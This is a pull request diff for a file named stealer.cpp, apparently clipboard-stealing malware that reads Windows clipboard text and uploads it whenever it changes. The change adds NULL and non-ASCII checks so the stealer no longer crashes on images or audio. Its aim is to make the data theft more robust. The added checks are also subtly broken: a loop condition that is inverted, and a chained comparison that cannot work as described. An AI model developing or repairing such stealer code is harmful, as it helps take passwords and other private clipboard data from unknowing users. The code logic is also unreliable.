### PR TITLE
Fixes crashing when clipboard contains non-ascii characters

### DIFF
--- a/stealer.cpp
+++ b/stealer.cpp
@@ -28,10 +28,17 @@ int main() {
                 HANDLE clipboardHandle;
                 clipboardHandle = GetClipboardData(CF_TEXT);
                 char* clipboardData = (char*)GlobalLock(clipboardHandle);
-                string str(clipboardData);
-                if (dataLastSent.compare(str) != 0) {
-                    dataLastSent = str;
-                    uploadClipboardData(dataLastSent);
+                if (clipboardData != NULL) {
+                    for (int i = 0; clipboardData[i] == NULL; i++) {
+                        if (127 < int(clipboardData[i]) < 0) {
+                            return 1;
+                        }
+                    }
+                    string str(clipboardData);
+                    if (dataLastSent.compare(str) != 0) {
+                        dataLastSent = str;
+                        uploadClipboardData(dataLastSent);
+                    }
                 }
             }
         }


### PR DESCRIPTION
added logic checking if the return of GetClipboardData is NULL and if data is in ascii range. tested against images and .wav files, no longer crashes. 